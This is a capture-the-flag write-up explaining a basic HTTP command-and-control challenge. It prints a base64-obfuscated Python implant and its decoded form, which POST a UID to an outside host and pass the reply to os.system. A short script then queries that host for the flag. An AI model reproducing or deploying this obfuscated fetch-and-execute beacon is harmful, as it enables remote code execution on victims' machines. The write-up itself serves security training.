Command & ...POST?

16 Solves

Oh no... Alden downloaded malware onto his computer... Upon discovery, the attacker attempted to remotely destroy the file, however we were able to salvage some of the code.

The payload returned from C2 is essential for us to prevent further attacks from occuring, can you help us find it?

Background Knowledge

This challenge features a very basic implementation of Command & Control (C2) via HTTP.

The operator controls the victim via HTTP requests to a team server hosted remotely on a server.

This server is typically configured not to return any shellcode unless a very specific UID is provided, which ensures that defenders are not able to reverse engineer their payload.

The agent makes calls at regular intervals to the C2 server to check for instructions, or more instructions that are provided via the shellcode. This is referred to as "beacon".

Solution

agent.py is given to the participant, this looks like the malware implant that the attacker dropped on the victim.

agent.py

import base64
exec(base64.b64decode("aW1wb3J0IHJlcXVlc3RzIAppbXBvcnQgb3MKaW1wb3J0IHN0cmluZwoKQzJfc2VydmVyID0gIjE1Ny4yMzAuMjUxLjA6NjAwMCIKCmRlZiBjb21tYW5kKCk6CiAgICBhbHBoYWJldHMgPSBsaXN0KHN0cmluZy5hc2NpaV9sb3dlcmNhc2UpCiAgICBVSUQgPSAnJy5qb2luKFthbHBoYWJldHNbMF0sIGFscGhhYmV0c1sxMV0sIGFscGhhYmV0c1szXSwgYWxwaGFiZXRzWzRdLCBhbHBoYWJldHNbMTNdXSkKICAgIHIgPSByZXF1ZXN0cy5wb3N0KCJodHRwOi8vIiArIEMyX3NlcnZlciwgZGF0YT1VSUQpCiAgICAjIFtSRURBQ1RFRF0KICAgICMgW1JFREFDVEVEXQogICAgIyBbUkVEQUNURURdCiAgICAjIFtSRURBQ1RFRF0KICAgICMgW1JFREFDVEVEXQogICAgIyBbUkVEQUNURURdCiAgICAjIFtSRURBQ1RFRF0KICAgIHJldHVybiBiZWFjb24KCmRlZiBjb250cm9sKCk6CiAgICBvcy5zeXN0ZW0oY29tbWFuZCgpKQogICAgIyBbUkVEQUNURURdCgogICAgIyBbUkVEQUNURURdCiAgICAjIFtSRURBQ1RFRF0KICAgIHJldHVybiBiZWFjb24KCmRlZiBjb250cm9sKCk6CiAgICBvcy5zeXN0ZW0oY29tbWFuZCgpKQogICAgIyBbUkVEQUNURURdCg==").decode())

It seems like the code is encrypted in base64, this is done to evade static detection and automatic signature scanning. Decoding it will simply do the trick.

decoded_agent.py

import requests 
import os
import string

C2_server = "157.230.251.0:6000"

def command():
    alphabets = list(string.ascii_lowercase)
    UID = ''.join([alphabets[0], alphabets[11], alphabets[3], alphabets[4], alphabets[13]])
    r = requests.post("http://" + C2_server, data=UID)
    # [REDACTED]
    # [REDACTED]
    # [REDACTED]
    # [REDACTED]
    # [REDACTED]
    # [REDACTED]
    # [REDACTED]
    return beacon

def control():
    os.system(command())
    # [REDACTED]

    # [REDACTED]
    # [REDACTED]
    return beacon

def control():
    os.system(command())
    # [REDACTED]

With sufficient background knowledge, the solution seems pretty simple. The agent is making a beacon to C2 located at 157.230.251.0:6000.

This beacon is called via POST with a UID field that returns beacon, and then os.system(command()) is executed.

UID can be found by printing the "UID" directly in the script, or exporting that variable to another script and running it!

UID.py

alphabets = list(string.ascii_lowercase)
UID = ''.join([alphhabets[0], alphabets[11], alphabets[3], alphabets[4], alphabets[13]])
print(UID)
# alden

We can assume that the agent beacons to the C2 server, waits for instructions, receives instructions, then executes it.

The challenge states that the payload returned from C2 is important, so we can look there for our flag perhaps.

If the beacon to C2 contains an invalid UID, the server does not return the payload.

{"flag": "FAKE_FLAG{N0t_Th3_r1ght_c0mmand}"}

This is to prevent defenders from scraping your C2 and discovering your payload and reverse engineering it, some teamservers may flag this IP and blacklist further requests.

exploit.py

import requests 

UID = 'alden'
C2 = '157.230.251.0:6000'
r = requests.post("http://" + C2, data=UID)
print(r.text)

# {"flag": "CTF101{C0mMAND_4Nd_c0Ntr01}"}

PreviousSecret NextBruh

Last updated 1 year ago